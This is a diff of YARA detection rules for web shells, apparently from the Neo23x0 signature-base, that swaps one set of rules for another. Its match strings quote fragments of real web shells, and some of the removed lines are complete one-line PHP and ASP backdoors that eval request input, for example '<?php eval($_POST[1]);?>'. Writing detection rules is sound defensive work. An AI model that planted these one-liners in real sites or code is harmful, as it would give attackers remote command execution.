+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4371-L4384"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2782bb170acaed3829ea9a04f0ac7218"
-		logic_hash = "1caccadf2bd7d265f9b5026c82acc31ade95313d57382651004db8b5e361312d"
-		score = 70
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+		logic_hash = "969f0f12449375a9ebbb8a68fd4b3db395927416d5cceccdb7f2c64310430880"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "// Web Shell!!" fullword
-		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
-		$s3 = "$default_charset = \"UTF-8\";" fullword
-		$s4 = "// url:http://www.weigongkai.com/shell/"
+		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
+		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
+		$s2 = "dim zombie_array,special_array"
+		$s3 = "http://vnhacker.org"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Dev_Core
+rule SIGNATURE_BASE_Indexer_Asp
 {
 	meta:
-		description = "Web shells - generated from file dev_core.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file indexer.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "84ff60f9-36f7-5d29-9f38-8088fb42582e"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3365-L3383"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4385-L4396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "55ad9309b006884f660c41e53150fc2e"
-		logic_hash = "b3c7a9bdaa7e5bf76df9ffba94157777c32199edeaa1c8745e9400d138abc267"
-		score = 70
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+		logic_hash = "0a51f15bfb4289dcb70e1e0b96d100be12901ebf26ed9c0e543eda5f4aa91f1c"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
-		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
-		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
-		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
-		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
-		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
+		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Php
+rule SIGNATURE_BASE_Dxshell_Php_Php
 {
 	meta:
-		description = "Web shells - generated from file pHp.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "b89930b7-acf3-5078-8429-d59e27e4b00c"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3384-L3401"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4397-L4408"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b0e842bdf83396c3ef8c71ff94e64167"
-		logic_hash = "a943f3b0d1d56194e250c7cf3e05b2bfec7b29f91ef56085d645efa3fe8995c9"
-		score = 70
+		hash = "33a2b31810178f4c2e71fbdeb4899244"
+		logic_hash = "821f9295eba6119ad08349e769d1909cd7836b4e35795915e94095cf715dc6e5"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
-		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
-		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
-		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
-		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Pppp
+rule SIGNATURE_BASE_S72_Shell_V1_1_Coding_Html
 {
 	meta:
-		description = "Web shells - generated from file pppp.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "dfd3b80e-6245-5f74-9d6a-6006218891ac"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3402-L3417"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4409-L4421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cf01cb6e09ee594545693c5d327bdd50"
-		logic_hash = "bd09fc2ec88bea83b16e63afafa3d5f74f119a81046a663322f5b396b48da135"
-		score = 70
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+		logic_hash = "aef8840b72e5c435c11150007d6b3af2943126fefdc6df343d0f73755340e260"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Mail: chinese@hackermail.com" fullword
-		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
-		$s6 = "Site: http://blog.weili.me" fullword
+		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
+		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
+		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Code
+rule SIGNATURE_BASE_Kacak_Asp
 {
 	meta:
-		description = "Web shells - generated from file code.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file kacak.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "1ae15174-b84a-5826-b768-7afed65196db"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3418-L3435"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4422-L4435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a444014c134ff24c0be5a05c02b81a79"
-		logic_hash = "5ae053a9afc1f720c56304c434cd89861e1df4060b7d813921e7f85978227020"
-		score = 70
+		hash = "907d95d46785db21331a0324972dda8c"
+		logic_hash = "8542a3985dff2d1eb42f4d2c9f30405a4817a8e30075225c518ec52381f1f7df"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
-		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
-		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
-		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
-		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
+		$s0 = "Kacak FSO 1.0"
+		$s1 = "if request.querystring(\"TGH\") = \"1\" then"
+		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
+		$s4 = "mailto:BuqX@hotmail.com"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Jspyyy
+rule SIGNATURE_BASE_PHP_Backdoor_Connect_Pl_Php
 {
 	meta:
-		description = "Web shells - generated from file jspyyy.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "96c9258e-3894-5ee9-b52c-eb7ba7454416"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3436-L3449"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4436-L4448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
-		logic_hash = "0afe45556aa7b562672cc4b609cf001aaa617b03028322abac6524f666b069e1"
-		score = 70
+		hash = "57fcd9560dac244aeaf95fd606621900"
+		logic_hash = "b141546f45767884f9c8b1cc4c09ea25f90c0f3a3633bfeecad78b60e7f20306"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
+		$s0 = "LorD of IRAN HACKERS SABOTAGE"
+		$s1 = "LorD-C0d3r-NT"
+		$s2 = "echo --==Userinfo==-- ;"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Xxxx
+rule SIGNATURE_BASE_Antichat_Socks5_Server_Php_Php
 {
 	meta:
-		description = "Web shells - generated from file xxxx.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "35d0930c-ef07-5fd4-9d7a-c0d685f92339"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3450-L3463"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4449-L4461"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5bcba70b2137375225d8eedcde2c0ebb"
-		logic_hash = "e14cc1eaf357389ca58193c77ce2f54774aebb42be9df15f12415df356c7ed42"
-		score = 70
+		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
+		logic_hash = "d6b203561f95f431b3d2c241011ae08c05619d45c5900a28137481c029e8297e"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php eval($_POST[1]);?>  " fullword
+		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
+		$s3 = "#   [+] Domain name address type"
+		$s4 = "www.antichat.ru"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Jjjsp3
+rule SIGNATURE_BASE_Antichat_Shell_V1_3_Php
 {
 	meta:
-		description = "Web shells - generated from file JJjsp3.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "856cf977-24da-58e0-b6d2-820c92075ecc"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3464-L3477"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4462-L4474"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "949ffee1e07a1269df7c69b9722d293e"
-		logic_hash = "44889540effa2f71889e7f6d0c5d12486e256d83b9230c4902d56f6a59b7939b"
-		score = 70
+		hash = "40d0abceba125868be7f3f990f031521"
+		logic_hash = "566c324f3bf44ce9f32ddad82a8d3daa87a8a75b5ca0c8286bc912a8ae4ac8e9"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
+		$s0 = "Antichat"
+		$s1 = "Can't open file, permission denide"
+		$s2 = "$ra44"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_PHP1
+rule SIGNATURE_BASE_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_Php
 {
 	meta:
-		description = "Web shells - generated from file PHP1.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "3e81f628-31b4-5c22-943e-62c8cb4c0c4d"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3478-L3493"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4475-L4487"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
-		logic_hash = "1c5eb355455c7fbd2b74d91f78e1d77f460dfeb4fe0ee65f18aa1453337b67a0"
-		score = 70
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+		logic_hash = "d6d2a3999f2e8ceb70f57697c0a845edbbcfce0aba151ec6a0ac23f55265cd47"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
-		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
-		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
+		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
+		$s1 = "Mode Shell v1.0</font></span>"
+		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Jjjsp2
+rule SIGNATURE_BASE_Mysql_Php_Php
 {
 	meta:
-		description = "Web shells - generated from file JJJsp2.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file mysql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3494-L3510"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4488-L4500"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5a9fec45236768069c99f0bfd566d754"
-		logic_hash = "47dca67c7a01035996d032cb3871da5532aea81ab6570c93c4a6b148fd95e9f9"
-		score = 70
+		hash = "12bbdf6ef403720442a47a3cc730d034"
+		logic_hash = "60e235310f378698ffcc3ae6a07ab5dd94a660ca4b1504cc878d9741f751d5d1"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
-		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
-		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
-		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
+		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
+		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Radhat
+rule SIGNATURE_BASE_Worse_Linux_Shell_Php
 {
 	meta:
-		description = "Web shells - generated from file radhat.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "e223e2a9-7c7a-597a-8b90-a63ee11805ea"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3511-L3524"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4501-L4512"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "72cb5ef226834ed791144abaa0acdfd4"
-		logic_hash = "28d4d380b25da05a3be439bad72725fa49c947535dfeb5c24994a849c0592b81"
-		score = 70
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+		logic_hash = "47801296b700e85f9e08857eb06f845ef8ed3f88b7d0de34d4b7c47cef6cc7fb"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "sod=Array(\"D\",\"7\",\"S"
+		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
+		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Asp1
+rule SIGNATURE_BASE_Cyberlords_Sql_Php_Php
 {
 	meta:
-		description = "Web shells - generated from file asp1.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3525-L3539"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4513-L4526"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b63e708cd58ae1ec85cf784060b69cad"
-		logic_hash = "6c76c5388825e29d333096d4cfa3782b7776f31b206a0ed5a8809428d698778b"
-		score = 70
+		hash = "03b06b4183cb9947ccda2c3d636406d4"
+		logic_hash = "b3286f9fd86c90c5afc79801b6d65c9ae52ee1c37da93ff15461d84f37ef8019"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
-		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
+		$s0 = "Coded by n0 [nZer0]"
+		$s1 = " www.cyberlords.net"
+		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
+		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Php6
+rule SIGNATURE_BASE_Cmd_Asp_5_1_Asp
 {
 	meta:
-		description = "Web shells - generated from file php6.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "fc204ab8-892d-5435-a737-a185ca32e938"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3540-L3555"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4527-L4538"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ea75280224a735f1e445d244acdfeb7b"
-		logic_hash = "495dc6c6769b8605ea946c012ad0ebb54685e7e91afd383027640753d90c6b3f"
-		score = 70
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+		logic_hash = "a41c83da1a65e67b6f4ac6ad7cc8702486957ab0c7dda658d071e603338c324b"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "array_map(\"asx73ert\",(ar"
-		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
-		$s4 = "shell.php?qid=zxexp  " fullword
+		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
+		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Xxx
+rule SIGNATURE_BASE_Pws_Php_Php
 {
 	meta:
-		description = "Web shells - generated from file xxx.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file pws.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "1ec47c33-dbec-50bd-b4b0-8f00b704a816"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3556-L3569"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4539-L4551"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0e71428fe68b39b70adb6aeedf260ca0"
-		logic_hash = "837ed266af8a65ac683be39c32509df34bc8041b336a71c12700ca73bf210b4d"
-		score = 70
+		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
+		logic_hash = "98dae8aab5bfd58f4264e318f5a5b5900b38687386f9d7f09c31da0f51d57bc0"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
+		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
+		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
+		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Getpostphp
+rule SIGNATURE_BASE_PHP_Shell_Php_Php
 {
 	meta:
-		description = "Web shells - generated from file GetPostpHp.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "6978126c-5414-52d2-b085-6e5589716d93"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3570-L3583"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4552-L4563"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "20ede5b8182d952728d594e6f2bb5c76"
-		logic_hash = "e75f66200593c3fdaadf1881235847f6c3f3caadcb7ffe13e8b01bce5f922702"
-		score = 70
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+		logic_hash = "2d5b6e08bfe9e1551dab12b01189dadc924c097427c996684bab96c48d528395"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
+		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
 
 	condition:
 		all of them
 }
